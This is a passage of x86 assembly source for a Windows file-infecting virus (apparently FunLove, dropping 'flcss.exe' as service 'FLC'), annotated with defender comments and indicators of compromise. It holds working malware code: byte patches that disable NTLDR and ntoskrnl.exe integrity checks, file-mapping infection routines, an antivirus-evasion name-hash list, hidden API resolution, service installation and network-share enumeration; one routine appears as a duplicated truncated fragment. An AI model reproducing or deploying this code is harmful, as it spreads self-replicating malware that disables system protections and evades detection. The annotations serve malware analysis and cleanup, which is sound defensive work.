; the NTLDR patch skipping the kernel checksum check - treat as unconfirmed by this listing).
; Defender note: PatchFile does not restore timestamps, and the hard-coded WINNT path is used
; regardless of the real system root; verify both files against vendor hashes after cleanup.
;**********************************************************************************************
BlownAway:
leaesi,[offset NTLDR + ebx]
movedi,DirEnd
movsd
movsd; append 'NTLDR',0 (8 bytes copied; 2 spill from the next table, after the NUL)
leaedi,[offset Buffer1 + ebx]; p_Filename
leaesi,[offset NT4_NTLDR + ebx]
cmpbyte ptr [offset OS + ebx],01; NT4?
jzshort BA_00
addesi,10; otherwise the Win2K pair (also chosen when OS = 0)
BA_00:
pushedi
pushesi; p_PatchAddr = search pattern; the replacement follows at +size
push05; p_PatchSize
callPatchFile
leaesi,[offset NTOSKRNL + ebx]; 'WINNT\System32\ntoskrnl.exe',0
movedi,DirEnd
BA_01:
movsb
cmpbyte ptr [esi - 1],00
jnzshort BA_01; copy including the NUL
leaedi,[offset Buffer1 + ebx]
leaesi,[offset NT4_NTOSKRNL + ebx]
cmpbyte ptr [offset OS + ebx],01
jzshort BA_02
addesi,18; Win2K pair
BA_02:
pushedi
pushesi
push09
callPatchFile
ret
; PatchFile(p_PatchSize, p_PatchAddr, p_Filename): map the whole file read/write, scan it
; linearly for the p_PatchSize-byte pattern at p_PatchAddr and, on the first hit, overwrite it
; with the p_PatchSize bytes that follow the pattern. Timestamps are NOT restored (contrast
; InfectFile), so a patched NTLDR / ntoskrnl.exe carries a fresh last-write time.
PatchFile:
pushp_Filename
push03; OPEN_EXISTING
callOpenFile
cmpeax,-1
jzshort PA_Exit
movp_FileHandle,eax
push00
pusheax
callGetFileSize
movp_FileSize,eax
pushp_FileHandle
pusheax
callMapFile; mapping of the file's own size
oreax,eax
jzshort PA_CloseFile
movp_MapHandle,eax
pusheax
callViewMap
oreax,eax
jzshort PA_CloseMap
movedx,eax; view base
movedi,eax
movesi,p_PatchAddr
movecx,p_FileSize; one compare per file byte; the last compares may read up to
PA_00:; p_PatchSize-1 bytes past the end of the view
pushecx
pushesi
pushedi
movecx,p_PatchSize
repzcmpsb
popedi
popesi
popecx
jzshort PA_01; pattern found at edi
incedi
loopPA_00
jmpshort PA_Unmap; not found (already patched, another build, or not an NT system file)
PA_01:
movecx,p_PatchSize
addesi,ecx; the replacement bytes follow the pattern
repzmovsb; write them in place through the mapping
PA_Unmap:
pushedx
callUnmapViewOfFile
PA_CloseMap:
pushp_MapHandle
callCloseHandle
PA_CloseFile:
pushp_FileHandle
callCloseHandle
PA_Exit:
ret
;**********************************************************************************************
; GetDelta: ebx := runtime address of VStart (call/pop delta), so position-dependent data can
; be reached as [offset X + ebx]. Clobbers ebx, which is callee-saved in the Win32 ABI.
;**********************************************************************************************
GetDelta:
calldelta
delta:
popebx; ebx = address of "delta"
subebx,offset delta - VStart; minus its assembled distance from VStart
ret
;**********************************************************************************************
; RelocKernel32(r_Kernel32 = an address inside KERNEL32): find GetProcAddress via Whereis_GPA,
; then resolve every KERNEL32 thunk in Kernel32_Functions. eax = 0 on failure.
;**********************************************************************************************
RelocKernel32:
pushr_Kernel32
callWhereis_GPA
oreax,eax
jzshort RK_00; unsupported kernel32 build
pusheax; DLL_Base = kernel32 base
leaesi,[offset Kernel32_Functions + ebx]
pushesi; DLL_Func
callDLL_Relocate
RK_00:
ret
;**********************************************************************************************
; RelocAdvapi32: LoadLibraryA("ADVAPI32.dll") and resolve the service-control thunks.
;**********************************************************************************************
RelocAdvapi32:
leaeax,[offset ADVAPI32_Name + ebx]
pusheax
callLoadLibraryA
oreax,eax
jzshort RA_00
pusheax; DLL_Base
leaesi,[offset ADVAPI32_Functions + ebx]
pushesi; DLL_Func
callDLL_Relocate
RA_00:
ret
;**********************************************************************************************
; OpenFile(o_OpenMode, o_Filename): strips read-only/hidden/system by resetting the attributes
; to 0x20 (FILE_ATTRIBUTE_ARCHIVE), then CreateFileA for read+write with no sharing.
; Returns the handle or INVALID_HANDLE_VALUE (-1). Plain "ret": as listed the two arguments
; stay on the caller's stack.
;**********************************************************************************************
OpenFile:
push20; FILE_ATTRIBUTE_ARCHIVE
pusho_Filename
callSetFileAttributesA
push00; hTemplateFile
push80; FILE_ATTRIBUTE_NORMAL
pusho_OpenMode; dwCreationDisposition (2 = CREATE_ALWAYS, 3 = OPEN_EXISTING)
push00; lpSecurityAttributes
push00; dwShareMode = 0, exclusive - this is also how a running FLCSS.EXE blocks re-creation
push0C0000000; GENERIC_READ | GENERIC_WRITE
pusho_Filename
callCreateFileA
ret
;**********************************************************************************************
; MapFile(m_FileSize, m_FileHandle): CreateFileMappingA(h, NULL, PAGE_READWRITE, 0, size, NULL)
; NOTE(review): the first copy below (ending in the truncated "callCreateFileM", without ret)
; is a duplicated fragment of the transcription; the complete routine is the second one.
; Left as published.
;**********************************************************************************************
MapFile:
push00
pushm_FileSize
push00
push04
push00
pushm_FileHandle
callCreateFileM
;**********************************************************************************************
; MapFile - complete copy
;**********************************************************************************************
MapFile:
push00; lpName = NULL
pushm_FileSize; dwMaximumSizeLow - a size larger than the file enlarges the file
push00; dwMaximumSizeHigh
push04; PAGE_READWRITE
push00; lpAttributes
pushm_FileHandle
callCreateFileMappingA
ret
ViewMap:; MapViewOfFile(v_MapHandle, FILE_MAP_WRITE, 0, 0, 0): map the whole file writable
push00; dwNumberOfBytesToMap = 0 (entire mapping)
push00; dwFileOffsetLow
push00; dwFileOffsetHigh
push02; FILE_MAP_WRITE
pushv_MapHandle
callMapViewOfFile
ret
;**********************************************************************************************
; Wait_A_Little: after an infection, if at least 0x4000 ms have elapsed since Tick, sleep
; 0x16000 ms and restart the window. Rate-limits disk activity between infections.
;**********************************************************************************************
Wait_A_Little:
callGetTickCount
subeax,[offset Tick + ebx]; elapsed since the window started
cmpeax,4000
jcshort WAL_00
push16000
callSleep
callGetTickCount
mov[offset Tick + ebx],eax
WAL_00:
ret
GetRand:; Rand := (Rand * 7FFFFFFFh + 1) mod 0FFFFFFFBh; returns eax = new Rand. Preserves ecx/edx.
pushecx
pushedx
moveax,[offset Rand + ebx]
xoredx,edx
movecx,7FFFFFFF
mulecx; edx:eax = Rand * 0x7FFFFFFF
inceax; +1 (a carry out of eax is not propagated into edx)
movecx,0FFFFFFFBh
divecx; edx < 0xFFFFFFFB here, so the 64-bit divide cannot fault
moveax,edx; remainder
mov[offset Rand + ebx],eax
popedx
popecx
ret
;**********************************************************************************************
; Data. All of it lives in the code segment and is reached via ebx.
;**********************************************************************************************
HostCode db8 dup (?); the 8 original entry-point bytes of the current host (restored at VStart)
GPA_Sigs:; 8-byte code signatures scanned for by Whereis_GPA; GetProcAddress = match + 3
W9xdb0C2,04,00,57,6A,22,2Bh,0D2; Win9x kernel32
NT4db0C2,04,00,55,8Bh,4C,24,0C; NT4 kernel32
W2Kdb00F,00,00,55,8Bh,0ECh,51,51; Win2K kernel32
NTLDRdb'NTLDR',0
NT4_NTLDR db3Bh,46,58,74,07; NT4 NTLDR search pattern: cmp eax,[esi+58h] / jz short +7
db3Bh,46,58,0EBh,07; replacement: jz -> jmp short +7
W2K_NTLDR db3Bh,47,58,74,07; Win2K: cmp eax,[edi+58h] / jz short +7
db3Bh,47,58,0EBh,07; replacement: jmp short +7
NTOSKRNL db'WINNT\System32\ntoskrnl.exe',0; hard-coded path, the real system root is not consulted
NT4_NTOSKRNL db8A,0C3,5F,5E,5Bh,5Dh,0C2,28,00; NT4: mov al,bl / pop edi,esi,ebx,ebp / ret 28h
db0B0,01,5F,5E,5Bh,5Dh,0C2,28,00; replacement: mov al,1 (always return TRUE)
W2K_NTOSKRNL db8A,45,14,5F,5E,5Bh,5Dh,0C2,28; Win2K: mov al,[ebp+14h] / pops / ret 28h
db0B0,01,90,5F,5E,5Bh,5Dh,0C2,28; replacement: mov al,1 / nop
;**********************************************************************************************
; Files whose first 4 name characters (lower-cased, XOR 61F81F61h) hash to one of these are
; never infected: anti-virus products and a few system files (smss.exe among them).
;**********************************************************************************************
SkipNames:
dd139D7300h ; aler
dd0F977200h ; amon
dd118E7E1Eh ; _avp
dd52886900h ; avp3
dd0C886900h ; avpm
dd13883207h ; f-pr
dd168E7E0Fh ; navw
dd0F997C12h ; scan
dd128B7212h ; smss
dd04907B05h ; ddhe
dd00946F05h ; dpla
dd00946F0Ch ; mpla
Process db'flcss.exe',0; dropped file name (IOC: <system dir>\flcss.exe, 4608 bytes)
Service db'FLC',0; NT service name and Win9x window class name (IOC)
; Minimal import directory for the dropped EXE: one descriptor importing KERNEL32!Beep,
; enough for the loader to map KERNEL32 (real API addresses are found by scanning).
VImports:
ddoffset Kernel32_Pointers; OriginalFirstThunk
dd-1,-1; TimeDateStamp, ForwarderChain
ddoffset Kernel32_Name; Name
ddoffset Kernel32_Relocated; FirstThunk (IAT)
db14 dup (0); terminating null descriptor (0x14 bytes)
Kernel32_Pointersddoffset Kernel32_Beep
Kernel32_Relocatedddoffset Kernel32_Beep; overwritten by the loader; reset in CreateExecutable
Kernel32_Beepdb?,?,'Beep',0; IMAGE_IMPORT_BY_NAME (hint, name)
;*********************************************************************************************
; API thunks. Layout of each: B8 imm32 (mov eax,imm32) FF E0 (jmp eax) 'Name',0.
; DLL_Relocate writes the resolved address into imm32; "call Name" then jumps through eax.
; Beep is the only entry in the PE import table - none of these names appear there, so
; import-based static inspection of the dropper sees only Beep.
;*********************************************************************************************
Kernel32_Namedb'KERNEL32.dll',0
Kernel32_Functions:
CloseHandle:db0B8,4 dup(?),0FF,0E0,'CloseHandle',0
CreateFileA:db0B8,4 dup(?),0FF,0E0,'CreateFileA',0
CreateFileMappingA: db0B8,4 dup(?),0FF,0E0,'CreateFileMappingA',0
CreateProcessA:db0B8,4 dup(?),0FF,0E0,'CreateProcessA',0
CreateThread:db0B8,4 dup(?),0FF,0E0,'CreateThread',0
FindFirstFileA:db0B8,4 dup(?),0FF,0E0,'FindFirstFileA',0
FindNextFileA:db0B8,4 dup(?),0FF,0E0,'FindNextFileA',0
FindClose:db0B8,4 dup(?),0FF,0E0,'FindClose',0
GetCurrentProcessId: db0B8,4 dup(?),0FF,0E0,'GetCurrentProcessId',0
GetDriveTypeA:db0B8,4 dup(?),0FF,0E0,'GetDriveTypeA',0
GetFileSize:db0B8,4 dup(?),0FF,0E0,'GetFileSize',0
GetProcAddress:db0B8,4 dup(?),0FF,0E0,'GetProcAddress',0
GetTickCount:db0B8,4 dup(?),0FF,0E0,'GetTickCount',0
GetSystemDirectoryA: db0B8,4 dup(?),0FF,0E0,'GetSystemDirectoryA',0
LoadLibraryA:db0B8,4 dup(?),0FF,0E0,'LoadLibraryA',0
MapViewOfFile:db0B8,4 dup(?),0FF,0E0,'MapViewOfFile',0
ReadFile:db0B8,4 dup(?),0FF,0E0,'ReadFile',0
SetFileAttributesA: db0B8,4 dup(?),0FF,0E0,'SetFileAttributesA',0
SetFileTime:db0B8,4 dup(?),0FF,0E0,'SetFileTime',0
Sleep:db0B8,4 dup(?),0FF,0E0,'Sleep',0
UnmapViewOfFile:db0B8,4 dup(?),0FF,0E0,'UnmapViewOfFile',0
VirtualAlloc:db0B8,4 dup(?),0FF,0E0,'VirtualAlloc',0
VirtualFree:db0B8,4 dup(?),0FF,0E0,'VirtualFree',0
WriteFile:db0B8,4 dup(?),0FF,0E0,'WriteFile',0
; Table terminator: the next byte is not B8h, so DLL_Relocate stops here. The original
; comment says the API below "does not exist in Win9x"; in fact RegisterServiceProcess is
; the Win9x-only API and is resolved separately in VService (on NT that lookup fails).
db0
RegisterServiceProcess: db0B8,4 dup(?),0FF,0E0,'RegisterServiceProcess',0
USER32_Namedb'USER32.dll',0
RegisterClassA:db0B8,4 dup(?),0FF,0E0,'RegisterClassA',0; resolved by hand in VService
ADVAPI32_Namedb'ADVAPI32.dll',0
ADVAPI32_Functions:; resolved by RelocAdvapi32
OpenSCManagerA:db0B8,4 dup(?),0FF,0E0,'OpenSCManagerA',0
OpenServiceA:db0B8,4 dup(?),0FF,0E0,'OpenServiceA',0
CreateServiceA:db0B8,4 dup(?),0FF,0E0,'CreateServiceA',0
StartServiceA:db0B8,4 dup(?),0FF,0E0,'StartServiceA',0
StartServiceCtrlDispatcherA: db0B8,4 dup(?),0FF,0E0,'StartServiceCtrlDispatcherA',0
RegisterServiceCtrlHandlerA: db0B8,4 dup(?),0FF,0E0,'RegisterServiceCtrlHandlerA',0
SetServiceStatus:db0B8,4 dup(?),0FF,0E0,'SetServiceStatus',0
MPR_Namedb'MPR.dll',0
MPR_Functions:; resolved by InfectNetwork
WNetOpenEnumA:db0B8,4 dup(?),0FF,0E0,'WNetOpenEnumA',0
WNetEnumResourceA:db0B8,4 dup(?),0FF,0E0,'WNetEnumResourceA',0
WNetCloseEnum:db0B8,4 dup(?),0FF,0E0,'WNetCloseEnum',0
; End of the replicated body (MASM's default case-insensitive labels let this match the
; VEnd used in VSize's EQU - TODO confirm). Everything below is runtime state, not copied.
vend:
Kernel32_Basedd?; hard-coded kernel32 base chosen by Whereis_GPA
Randdd?; PRNG state (seeded from GetTickCount)
Tickdd?; throttle window start for Wait_A_Little
OSdb?; 0 = Win9x, 1 = NT4, 2 = Win2K
ALIGN100
Buffer1 db200 dup (0); current path / command line / SERVICE_TABLE / WNDCLASS / SERVICE_STATUS scratch (0x200 bytes)
Buffer2 db200 dup (?); WIN32_FIND_DATAA, and STARTUPINFO+PROCESS_INFORMATION scratch
Buffer3 db2000 dup (?); full path of the victim, then its first 0x2000 header bytes
CODEENDS
ENDmain